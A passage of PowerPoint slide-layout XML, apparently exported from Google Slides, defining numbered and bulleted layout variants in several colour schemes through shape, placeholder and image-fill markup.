                    <a:srgbClr val="000000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9" name="Google Shape;449;p8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0" name="Google Shape;450;p81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1" name="Google Shape;451;p81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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452" name="Google Shape;452;p81"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3305156" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="453" name="Google Shape;453;p8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lang="en-US" sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000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4" name="Google Shape;454;p8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5" name="Google Shape;455;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3572250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6" name="Google Shape;456;p81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35722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457" name="Google Shape;457;p81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458" name="Google Shape;458;p8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lang="en-US" sz="2100" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000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9" name="Google Shape;459;p8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0" name="Google Shape;460;p81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1" name="Google Shape;461;p81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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. Numbered 1–5 (Grey)">
  <p:cSld name="CUSTOM_2_7_1_5_1"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8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4" name="Google Shape;464;p8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465" name="Google Shape;465;p8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66" name="Google Shape;466;p8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467" name="Google Shape;467;p8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68" name="Google Shape;468;p8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9" name="Google Shape;469;p82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US" sz="48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 b="0" i="0" u="none" strike="noStrike" cap="non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0" name="Google Shape;470;p82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1" name="Google Shape;471;p82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2" name="Google Shape;472;p82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3" name="Google Shape;473;p82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4" name="Google Shape;474;p82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US" sz="48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 b="0" i="0" u="none" strike="noStrike" cap="non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5" name="Google Shape;475;p82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US" sz="48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 b="0" i="0" u="none" strike="noStrike" cap="non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6" name="Google Shape;476;p82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7" name="Google Shape;477;p82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8" name="Google Shape;478;p82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9" name="Google Shape;479;p82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0" name="Google Shape;480;p82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US" sz="48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 b="0" i="0" u="none" strike="noStrike" cap="non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81" name="Google Shape;481;p82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US" sz="48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 b="0" i="0" u="none" strike="noStrike" cap="non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82" name="Google Shape;482;p82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3" name="Google Shape;483;p82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4" name="Google Shape;484;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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5" name="Google Shape;485;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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marR="0"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6" name="Google Shape;486;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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7" name="Google Shape;487;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6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marR="0"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8" name="Google Shape;488;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7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. Bullets 1–4 (Greens)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2"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83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1" name="Google Shape;491;p8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2" name="Google Shape;492;p8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493" name="Google Shape;493;p8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94" name="Google Shape;494;p8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495" name="Google Shape;495;p8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96" name="Google Shape;496;p8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7" name="Google Shape;497;p83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8" name="Google Shape;498;p83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9" name="Google Shape;499;p83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0" name="Google Shape;500;p83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1" name="Google Shape;501;p83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2" name="Google Shape;502;p83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3" name="Google Shape;503;p83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504" name="Google Shape;504;p8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5" name="Google Shape;505;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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6" name="Google Shape;506;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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Google Shape;507;p8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  <p15:guide id="2" pos="1512">
          <p15:clr>
            <a:srgbClr val="FA7B17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. Bullets 1–4 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1"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84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0" name="Google Shape;510;p8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1" name="Google Shape;511;p8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512" name="Google Shape;512;p8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13" name="Google Shape;513;p8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14" name="Google Shape;514;p8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15" name="Google Shape;515;p8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6" name="Google Shape;516;p84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7" name="Google Shape;517;p84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8" name="Google Shape;518;p84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9" name="Google Shape;519;p84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0" name="Google Shape;520;p84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1" name="Google Shape;521;p84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2" name="Google Shape;522;p84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523" name="Google Shape;523;p8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4" name="Google Shape;524;p8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5" name="Google Shape;525;p8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8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 Subsection Slide">
  <p:cSld name="CUSTOM_17_2_1_1_2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58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58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" name="Google Shape;23;p5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" name="Google Shape;24;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="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5" name="Google Shape;25;p5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. Bullets 1–4 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1"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85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9" name="Google Shape;529;p8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0" name="Google Shape;530;p8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531" name="Google Shape;531;p8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32" name="Google Shape;532;p8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33" name="Google Shape;533;p8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34" name="Google Shape;534;p8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5" name="Google Shape;535;p85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6" name="Google Shape;536;p85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7" name="Google Shape;537;p85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8" name="Google Shape;538;p85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9" name="Google Shape;539;p85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0" name="Google Shape;540;p85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1" name="Google Shape;541;p85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542" name="Google Shape;542;p85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3" name="Google Shape;543;p85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4" name="Google Shape;544;p85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85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. Bullets 1–4 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1_1"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86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8" name="Google Shape;548;p8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9" name="Google Shape;549;p8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550" name="Google Shape;550;p8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51" name="Google Shape;551;p8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52" name="Google Shape;552;p8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53" name="Google Shape;553;p8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4" name="Google Shape;554;p86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5" name="Google Shape;555;p86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6" name="Google Shape;556;p86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7" name="Google Shape;557;p86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8" name="Google Shape;558;p86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9" name="Google Shape;559;p86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0" name="Google Shape;560;p86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561" name="Google Shape;561;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="463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2" name="Google Shape;562;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="463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3" name="Google Shape;563;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="463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86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="463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1. Bullets 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4_1"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87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7" name="Google Shape;567;p8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8" name="Google Shape;568;p8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569" name="Google Shape;569;p8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70" name="Google Shape;570;p8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71" name="Google Shape;571;p8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72" name="Google Shape;572;p8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3" name="Google Shape;573;p87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4" name="Google Shape;574;p87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5" name="Google Shape;575;p87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6" name="Google Shape;576;p87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7" name="Google Shape;577;p87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8" name="Google Shape;578;p87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9" name="Google Shape;579;p87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0" name="Google Shape;580;p87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1" name="Google Shape;581;p87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582" name="Google Shape;582;p8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" name="Google Shape;583;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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Google Shape;584;p8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Google Shape;585;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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" name="Google Shape;586;p8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2. Bullets 1–5 (Green/Yellow)">
  <p:cSld name="CUSTOM_2_7_1_4_1_2"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88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9" name="Google Shape;589;p8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0" name="Google Shape;590;p8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591" name="Google Shape;591;p8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92" name="Google Shape;592;p8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93" name="Google Shape;593;p8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94" name="Google Shape;594;p8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5" name="Google Shape;595;p88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6" name="Google Shape;596;p88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7" name="Google Shape;597;p88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8" name="Google Shape;598;p88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9" name="Google Shape;599;p88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0" name="Google Shape;600;p88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1" name="Google Shape;601;p88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2" name="Google Shape;602;p88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3" name="Google Shape;603;p88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604" name="Google Shape;604;p8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" name="Google Shape;605;p8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p8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8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" name="Google Shape;608;p8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3. Bullets 1–5 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1"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89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1" name="Google Shape;611;p8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2" name="Google Shape;612;p8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613" name="Google Shape;613;p8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14" name="Google Shape;614;p8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15" name="Google Shape;615;p8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16" name="Google Shape;616;p8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7" name="Google Shape;617;p89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8" name="Google Shape;618;p89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9" name="Google Shape;619;p89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0" name="Google Shape;620;p89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1" name="Google Shape;621;p89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2" name="Google Shape;622;p89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3" name="Google Shape;623;p89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4" name="Google Shape;624;p89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5" name="Google Shape;625;p89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626" name="Google Shape;626;p89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7" name="Google Shape;627;p89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8" name="Google Shape;628;p89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Google Shape;629;p89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0" name="Google Shape;630;p89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  <p15:guide id="2" pos="1512">
          <p15:clr>
            <a:srgbClr val="FA7B17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4. Bullets 1–5 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1_1"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90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3" name="Google Shape;633;p9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4" name="Google Shape;634;p9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635" name="Google Shape;635;p9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36" name="Google Shape;636;p9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37" name="Google Shape;637;p9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38" name="Google Shape;638;p9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9" name="Google Shape;639;p90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0" name="Google Shape;640;p90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1" name="Google Shape;641;p90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2" name="Google Shape;642;p90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3" name="Google Shape;643;p90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4" name="Google Shape;644;p90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5" name="Google Shape;645;p90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6" name="Google Shape;646;p90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7" name="Google Shape;647;p90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648" name="Google Shape;648;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="463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9" name="Google Shape;649;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="463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0" name="Google Shape;650;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="463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Google Shape;651;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="463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2" name="Google Shape;652;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="463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5. Bullets 1–6 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_1"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91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5" name="Google Shape;655;p9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6" name="Google Shape;656;p9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657" name="Google Shape;657;p9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58" name="Google Shape;658;p9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59" name="Google Shape;659;p9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60" name="Google Shape;660;p9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61" name="Google Shape;661;p91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62" name="Google Shape;662;p91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3" name="Google Shape;663;p91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4" name="Google Shape;664;p91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5" name="Google Shape;665;p91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6" name="Google Shape;666;p91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7" name="Google Shape;667;p91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68" name="Google Shape;668;p91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69" name="Google Shape;669;p91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0" name="Google Shape;670;p91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1" name="Google Shape;671;p91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672" name="Google Shape;672;p9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3" name="Google Shape;673;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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4" name="Google Shape;674;p9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5" name="Google Shape;675;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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6" name="Google Shape;676;p9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7" name="Google Shape;677;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="236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6. Bullets 1–6 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2"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92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0" name="Google Shape;680;p9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1" name="Google Shape;681;p9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682" name="Google Shape;682;p9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83" name="Google Shape;683;p9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84" name="Google Shape;684;p9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85" name="Google Shape;685;p9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6" name="Google Shape;686;p92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7" name="Google Shape;687;p92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8" name="Google Shape;688;p92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9" name="Google Shape;689;p92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0" name="Google Shape;690;p92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1" name="Google Shape;691;p92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2" name="Google Shape;692;p92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3" name="Google Shape;693;p92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4" name="Google Shape;694;p92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5" name="Google Shape;695;p92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6" name="Google Shape;696;p92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697" name="Google Shape;697;p9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8" name="Google Shape;698;p9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9" name="Google Shape;699;p9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0" name="Google Shape;700;p9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1" name="Google Shape;701;p9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2" name="Google Shape;702;p9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7. Bullets 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_3"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93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5" name="Google Shape;705;p9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6" name="Google Shape;706;p9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707" name="Google Shape;707;p9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08" name="Google Shape;708;p9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709" name="Google Shape;709;p9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10" name="Google Shape;710;p9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1" name="Google Shape;711;p93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2" name="Google Shape;712;p93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3" name="Google Shape;713;p93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4" name="Google Shape;714;p93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5" name="Google Shape;715;p93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6" name="Google Shape;716;p93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7" name="Google Shape;717;p93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8" name="Google Shape;718;p93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9" name="Google Shape;719;p93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0" name="Google Shape;720;p93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1" name="Google Shape;721;p93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722" name="Google Shape;722;p93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3" name="Google Shape;723;p93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4" name="Google Shape;724;p93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5" name="Google Shape;725;p93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6" name="Google Shape;726;p93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7" name="Google Shape;727;p93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8. Bullets 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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94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0" name="Google Shape;730;p9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1" name="Google Shape;731;p9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732" name="Google Shape;732;p9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33" name="Google Shape;733;p9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734" name="Google Shape;734;p9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35" name="Google Shape;735;p9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6" name="Google Shape;736;p94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7" name="Google Shape;737;p94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8" name="Google Shape;738;p94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9" name="Google Shape;739;p94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0" name="Google Shape;740;p94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1" name="Google Shape;741;p94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2" name="Google Shape;742;p94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3" name="Google Shape;743;p94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4" name="Google Shape;744;p94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5" name="Google Shape;745;p94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6" name="Google Shape;746;p94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747" name="Google Shape;747;p94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8" name="Google Shape;748;p94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9" name="Google Shape;749;p94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0" name="Google Shape;750;p94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1" name="Google Shape;751;p94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2" name="Google Shape;752;p94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. Text with Sidebar">
  <p:cSld name="CUSTOM_2_4_1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59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="118" b="118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5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" name="Google Shape;29;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2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00000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0" name="Google Shape;30;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DBD9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" name="Google Shape;31;p59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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" name="Google Shape;32;p5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33" name="Google Shape;33;p5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4" name="Google Shape;34;p5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5" name="Google Shape;35;p59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9. Bullets 1–7 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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95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5" name="Google Shape;755;p9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6" name="Google Shape;756;p9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757" name="Google Shape;757;p9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58" name="Google Shape;758;p9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759" name="Google Shape;759;p9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60" name="Google Shape;760;p9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1" name="Google Shape;761;p95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2" name="Google Shape;762;p95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3" name="Google Shape;763;p95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4" name="Google Shape;764;p95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5" name="Google Shape;765;p95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6" name="Google Shape;766;p95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7" name="Google Shape;767;p95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8" name="Google Shape;768;p95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9" name="Google Shape;769;p95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0" name="Google Shape;770;p95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1" name="Google Shape;771;p95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2" name="Google Shape;772;p95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3" name="Google Shape;773;p95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774" name="Google Shape;774;p9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5" name="Google Shape;775;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036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6" name="Google Shape;776;p9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7" name="Google Shape;777;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036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8" name="Google Shape;778;p9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9" name="Google Shape;779;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="1388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80" name="Google Shape;780;p9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0. Bullets 1–7 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="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96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3" name="Google Shape;783;p9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4" name="Google Shape;784;p9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785" name="Google Shape;785;p9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86" name="Google Shape;786;p9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787" name="Google Shape;787;p9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88" name="Google Shape;788;p9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9" name="Google Shape;789;p96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0" name="Google Shape;790;p96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1" name="Google Shape;791;p96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2" name="Google Shape;792;p96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3" name="Google Shape;793;p96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4" name="Google Shape;794;p96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5" name="Google Shape;795;p96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6" name="Google Shape;796;p96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7" name="Google Shape;797;p96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8" name="Google Shape;798;p96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9" name="Google Shape;799;p96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0" name="Google Shape;800;p96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1" name="Google Shape;801;p96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802" name="Google Shape;802;p9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3" name="Google Shape;803;p9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4" name="Google Shape;804;p9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5" name="Google Shape;805;p9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6" name="Google Shape;806;p9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7" name="Google Shape;807;p9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08" name="Google Shape;808;p9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1. Bullets 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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p97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1" name="Google Shape;811;p9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2" name="Google Shape;812;p9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813" name="Google Shape;813;p9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14" name="Google Shape;814;p9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815" name="Google Shape;815;p9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16" name="Google Shape;816;p9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7" name="Google Shape;817;p97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8" name="Google Shape;818;p97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97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0" name="Google Shape;820;p97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97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2" name="Google Shape;822;p97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3" name="Google Shape;823;p97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4" name="Google Shape;824;p97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5" name="Google Shape;825;p97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6" name="Google Shape;826;p97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7" name="Google Shape;827;p97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8" name="Google Shape;828;p97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97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830" name="Google Shape;830;p97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1" name="Google Shape;831;p97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2" name="Google Shape;832;p97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3" name="Google Shape;833;p97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4" name="Google Shape;834;p97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5" name="Google Shape;835;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2882" b="2891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36" name="Google Shape;836;p97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2882" b="2891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2. Bullets 1–7 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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p98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9" name="Google Shape;839;p9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0" name="Google Shape;840;p9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841" name="Google Shape;841;p9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42" name="Google Shape;842;p9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843" name="Google Shape;843;p9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44" name="Google Shape;844;p9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5" name="Google Shape;845;p98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6" name="Google Shape;846;p98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98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8" name="Google Shape;848;p98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98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0" name="Google Shape;850;p98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98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2" name="Google Shape;852;p98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98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4" name="Google Shape;854;p98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5" name="Google Shape;855;p98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6" name="Google Shape;856;p98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7" name="Google Shape;857;p98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858" name="Google Shape;858;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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9" name="Google Shape;859;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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0" name="Google Shape;860;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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1" name="Google Shape;861;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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2" name="Google Shape;862;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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3" name="Google Shape;863;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615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64" name="Google Shape;864;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615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3. Bullets 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1"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9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7" name="Google Shape;867;p9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868" name="Google Shape;868;p9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69" name="Google Shape;869;p9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870" name="Google Shape;870;p9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71" name="Google Shape;871;p9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2" name="Google Shape;872;p99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3" name="Google Shape;873;p99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4" name="Google Shape;874;p99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5" name="Google Shape;875;p99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6" name="Google Shape;876;p99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7" name="Google Shape;877;p99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8" name="Google Shape;878;p99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9" name="Google Shape;879;p99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0" name="Google Shape;880;p99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1" name="Google Shape;881;p99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2" name="Google Shape;882;p99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3" name="Google Shape;883;p99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4" name="Google Shape;884;p99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5" name="Google Shape;885;p99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6" name="Google Shape;886;p99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7" name="Google Shape;887;p99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888" name="Google Shape;888;p9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9" name="Google Shape;889;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="103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0" name="Google Shape;890;p9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1" name="Google Shape;891;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="103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2" name="Google Shape;892;p9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3" name="Google Shape;893;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="103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4" name="Google Shape;894;p9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5" name="Google Shape;895;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="103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4. Bullets 1–8 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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0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8" name="Google Shape;898;p10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899" name="Google Shape;899;p10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00" name="Google Shape;900;p10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901" name="Google Shape;901;p10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02" name="Google Shape;902;p10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3" name="Google Shape;903;p100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4" name="Google Shape;904;p100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5" name="Google Shape;905;p100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6" name="Google Shape;906;p100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7" name="Google Shape;907;p100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8" name="Google Shape;908;p100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9" name="Google Shape;909;p100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0" name="Google Shape;910;p100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1" name="Google Shape;911;p100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2" name="Google Shape;912;p100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3" name="Google Shape;913;p100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4" name="Google Shape;914;p100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5" name="Google Shape;915;p100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6" name="Google Shape;916;p100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7" name="Google Shape;917;p100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8" name="Google Shape;918;p100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919" name="Google Shape;919;p10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0" name="Google Shape;920;p10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1" name="Google Shape;921;p10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2" name="Google Shape;922;p10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3" name="Google Shape;923;p10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4" name="Google Shape;924;p10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5" name="Google Shape;925;p10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6" name="Google Shape;926;p10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5. Bullets 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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p10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9" name="Google Shape;929;p10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930" name="Google Shape;930;p10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31" name="Google Shape;931;p10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932" name="Google Shape;932;p10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33" name="Google Shape;933;p10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4" name="Google Shape;934;p101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5" name="Google Shape;935;p101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6" name="Google Shape;936;p101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7" name="Google Shape;937;p101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8" name="Google Shape;938;p101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9" name="Google Shape;939;p101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0" name="Google Shape;940;p101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1" name="Google Shape;941;p101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2" name="Google Shape;942;p101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3" name="Google Shape;943;p101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4" name="Google Shape;944;p101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5" name="Google Shape;945;p101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6" name="Google Shape;946;p101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7" name="Google Shape;947;p101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8" name="Google Shape;948;p101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9" name="Google Shape;949;p101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950" name="Google Shape;950;p101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1" name="Google Shape;951;p101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2" name="Google Shape;952;p101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3" name="Google Shape;953;p101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4" name="Google Shape;954;p101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5" name="Google Shape;955;p101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6" name="Google Shape;956;p101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7" name="Google Shape;957;p101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6. Bullets 1–8 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1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Google Shape;959;p10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0" name="Google Shape;960;p10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961" name="Google Shape;961;p10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62" name="Google Shape;962;p10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963" name="Google Shape;963;p10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64" name="Google Shape;964;p10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5" name="Google Shape;965;p102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6" name="Google Shape;966;p102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7" name="Google Shape;967;p102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8" name="Google Shape;968;p102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9" name="Google Shape;969;p102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0" name="Google Shape;970;p102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1" name="Google Shape;971;p102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2" name="Google Shape;972;p102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3" name="Google Shape;973;p102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4" name="Google Shape;974;p102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5" name="Google Shape;975;p102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6" name="Google Shape;976;p102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7" name="Google Shape;977;p102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8" name="Google Shape;978;p102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9" name="Google Shape;979;p102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0" name="Google Shape;980;p102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981" name="Google Shape;981;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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2" name="Google Shape;982;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1274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3" name="Google Shape;983;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
